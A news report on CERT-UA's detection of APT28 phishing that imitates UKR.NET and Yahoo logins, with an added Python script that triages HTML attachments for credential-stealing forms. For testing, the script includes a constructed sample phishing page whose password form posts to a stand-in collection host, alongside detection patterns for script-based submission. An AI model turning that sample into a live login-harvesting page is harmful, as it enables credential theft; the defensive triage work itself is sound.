CERT-UA, the Ukrainian government’s computer emergency response team, has detected and investigated the spread of phishing attacks by the APT28 hacker group (also known as Pawn Storm, Fancy Bear, BlueDelta) to obtain authentication data of Ukrainians required to log in to public email services.
According to CERT-UA experts, the attackers send HTML files that imitate the web interface of email services (in particular, UKR.NET and Yahoo.com) and contain the logic to transmit the authentication data entered by the victim via HTTP POST requests. The stolen data is transmitted through previously compromised Ubiquiti devices running EdgeOS.
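The pattern described above (a standalone HTML file with a password field whose contents are POSTed to a host that does not belong to the imitated service) is easy to triage mechanically. The following Python script is an added example written for this page; it is not CERT-UA's or Recorded Future's tooling. It parses an HTML attachment with the standard library, collects forms, password inputs and inline script text, and reports every credential-carrying POST destination that is not on an allowlist of legitimate login hosts. The allowlist, the sample HTML files and the documentation-range address 203.0.113.10 standing in for the collection host are all constructed for the demonstration.

```python
"""Triage check for HTML attachments that imitate a webmail login page.

Added example, not CERT-UA's code. Flags an HTML file that carries a
password field and submits credentials by HTTP POST (via a <form> or an
inline script) to a host outside the imitated service's legitimate domains.
The allowlist and the sample inputs below are assumptions for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a genuine login form for each imitated service posts to.
LEGITIMATE_LOGIN_HOSTS = {
    "ukr.net": {"accounts.ukr.net", "mail.ukr.net"},
    "yahoo.com": {"login.yahoo.com"},
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Script APIs commonly used to submit form data without a <form> post.
JS_SUBMIT_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon", re.I)


class LoginPageParser(HTMLParser):
    """Collects forms, password fields and inline <script> text from an HTML file."""

    def __init__(self):
        super().__init__()
        self.forms = []               # one dict per <form>
        self.loose_password = False   # password field outside any <form>
        self.scripts = []             # inline <script> bodies (may arrive in chunks)
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": a.get("method", "get").lower(),
                          "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._form is not None:
                self._form["has_password"] = True
            else:
                self.loose_password = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _host(url):
    """Lower-cased hostname of a URL, or '' for relative/empty actions."""
    return (urlparse(url).hostname or "").lower()


def analyze_html(html, imitated_service):
    """Return a list of findings for an HTML file that imitates `imitated_service`.

    One finding per credential-carrying POST whose destination host is not on
    the allowlist, whether it is a plain <form> or a script-driven submission.
    """
    allowed = LEGITIMATE_LOGIN_HOSTS.get(imitated_service, set())
    parser = LoginPageParser()
    parser.feed(html)
    parser.close()
    findings = []

    for form in parser.forms:
        if not form["has_password"]:
            continue
        host = _host(form["action"])
        if form["method"] == "post" and host and host not in allowed:
            findings.append(f"password form POSTs to external host {host}")

    script_text = "".join(parser.scripts)
    if JS_SUBMIT_RE.search(script_text):
        for url in URL_RE.findall(script_text):
            host = _host(url)
            if host and host not in allowed:
                findings.append(f"script submits data to external host {host}")

    if parser.loose_password and script_text.strip():
        findings.append("password field outside any form with inline script present")
    return findings


# Constructed sample: a local HTML file dressed up as a webmail login page.
# 203.0.113.10 (documentation range) stands in for the credential-collection host.
SAMPLE_PHISH = """
<html><body>
<h1>Sign in to your mailbox</h1>
<form method="post" action="http://203.0.113.10/submit.php">
  <input type="text" name="login">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample: a form that posts to the service's own login host.
SAMPLE_BENIGN = """
<html><body>
<form method="post" action="https://login.yahoo.com/">
  <input type="text" name="username"><input type="password" name="passwd">
</form>
</body></html>
"""

if __name__ == "__main__":
    print(analyze_html(SAMPLE_PHISH, "ukr.net"))     # one finding
    print(analyze_html(SAMPLE_BENIGN, "yahoo.com"))  # []
```

Run it over the `.html` attachments quarantined by the mail gateway, passing the service the page visually imitates; a relative `action` on a file opened locally cannot reach the network, so only absolute external destinations are reported, and the script heuristic catches the variant where a password field is wired to a `fetch()` or `XMLHttpRequest` call instead of a `<form>`.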
In June, CERT-UA, in cooperation with Recorded Future, revealed the APT28 (BlueDelta) group’s espionage campaign against Ukrainian organizations.
The governmental Computer Emergency Response Team of Ukraine, CERT-UA, calls on responsible employees of organizations not to ignore reports of detected signs of anomalous activity and to take immediate measures to reduce the attack surface.